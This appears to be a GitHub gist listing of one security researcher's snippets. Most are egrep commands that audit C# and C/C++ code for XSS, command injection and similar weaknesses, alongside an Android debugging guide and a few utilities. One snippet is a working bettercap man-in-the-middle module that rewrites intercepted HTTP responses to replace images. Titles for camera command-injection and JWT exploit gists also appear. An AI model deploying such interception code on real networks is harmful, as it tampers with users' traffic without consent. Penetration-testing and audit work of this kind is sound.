Skip to content

Instantly share code, notes, and snippets.

View nstarke's full-sized avatar

Nicholas Starke nstarke

View GitHub Profile
@nstarke
nstarke / CSharp-Vulnerability-Egrep.sh
Last active December 5, 2015 17:39
Egrep commands to find security vulnerabilities and perform security audits on CSharp code. Useful for penetration testers operating in a Microsoft / CSharp environment.
# Returns instances where anti xss measures are deployed
egrep -r --include "*.cs" -e "(AntiXssEncoder|Server\.HtmlEncode|Html.Encode)" .
# Returns possible command injection areas
egrep -r --include "*.cs" -e "(Process|Process\.Start)\(" .
# Returns possible xss scenarios (string concatention in HTML/XML)
egrep -r --include "*.cs" -e "<.*>\"\s*\+.*\+\s*\"<.*>" .
# Returns places where anti csrf measure are deployed
@nstarke
nstarke / bettercap-rick-astley.rb
Last active May 8, 2019 17:47
A bettercap module that replaces all images in a HTTP response with a rick astley gif
class RickAstley < BetterCap::Proxy::Module
def on_request( request, response )
if response.content_type =~ /^text\/html.*/
BetterCap::Logger.info "Rick Rolling http://#{request.host}#{request.url}"
# replace img tags
response.body.gsub!( /\<img.*\>/, '<img src="http://i.giphy.com/Vuw9m5wXviFIQ.gif">' )
# replace CSS background-images
response.body.gsub!(/url\(.*\.(gif|jpg|jpeg|png).*\)/, 'url("http://i.giphy.com/Vuw9m5wXviFIQ.gif")')
elsif response.content_type =~ /^text\/css.*/
# replace CSS background-images
@nstarke
nstarke / regex-search-for-regex.sh
Created February 23, 2016 21:24
regex-search-for-regex
egrep --include "*.cpp" --include "*.c" -r -e "[\^]?(\.\*)|(\[\w+*\-\w+*\])|(\{\d+[\,\d+]?\})[\$]?" .
@nstarke
nstarke / c-cpp-egrep.sh
Created February 27, 2016 18:16
C and C++ Egrep
# see all character arrays of any hardcoded length
egrep --include "*.c*" -rnI -e 'char\s+[a-zA-Z0-9]+\[\d+\]' .
@nstarke
nstarke / iowa-house-video-grabber.sh
Created March 22, 2016 23:28
A short script to download Iowa House Video slices and reassemble them using FFMPEG
#!/bin/bash
# Example of Base URL: http://sg001-vod.sliq.net/00285-vod/_definst_/2016/03/House%20in%20Session_2016-03-22-13.58.50_2461_2.mp4
BASEURL=$1
# MAX only works up to 999 because of "seq -f "%03g". Change "%03g" as your order of magnitude increases.
MAX=$2
for i in $(seq -f "%03g" 0 $MAX); do
wget "$BASEURL/media_$i.ts" -O /tmp/video-$i.mp4
done
@nstarke
nstarke / release-android-debuggable.md
Last active March 22, 2025 12:56
How to make a Release Android App debuggable

How to make a Release Android App debuggable

Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage ( or adb shell run-as com.mypackge ls /data/data/com.mypackage/shared_prefs), but on a production release app downloaded from an app store you're most likely to see:

run-as: Package 'com.mypackage' is not debuggable
@nstarke
nstarke / find-all-strings-and-comments-in-source-code.md
Last active May 23, 2024 14:38
Find all strings and comments in source code

How to find all strings and comments in source code

Strings

One of the most useful commands I've developed for reviewing source is a command to extract all strings from a given directory. To execute this command, open a terminal and cd into the directory containing the source you would like to audit. Next, run:

egrep -e "(\"|')(\w|\s|\d)*(\"|')" -r -h -I -o . | sort -u 
@nstarke
nstarke / linux-el-capitan-vm.md
Last active June 16, 2023 03:20
How to create an OS X El Capitan VM that will run on Linux

How to create an OS X El Capitan VM that will run on Linux

VirtualBox only officially supports OS X guests on an OS X host, but it is possible to create one on an OS X host and transfer it over to a Linux host. This tutorial will go over one possible way to accomplish this task.

What you will need

  • An Apple computer running OS X 10.11
  • A Linux computer to transfer the VM over to
  • 20 GB free on the Apple Machine
  • 40 GB free on the Linux Machine
@nstarke
nstarke / dlink-dcs-930L.md
Last active April 17, 2024 09:03
DLink DCS 930L Command Injection and Image Still Exfiltration
@nstarke
nstarke / exploiting-jwt.js
Last active June 12, 2022 10:36
Exploiting JWT
// Original research publication:
// https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
//
// Depdency installation command:
// npm i [email protected]
//
// Node security advisory:
// https://nodesecurity.io/advisories/88
const jwt = require('jsonwebtoken');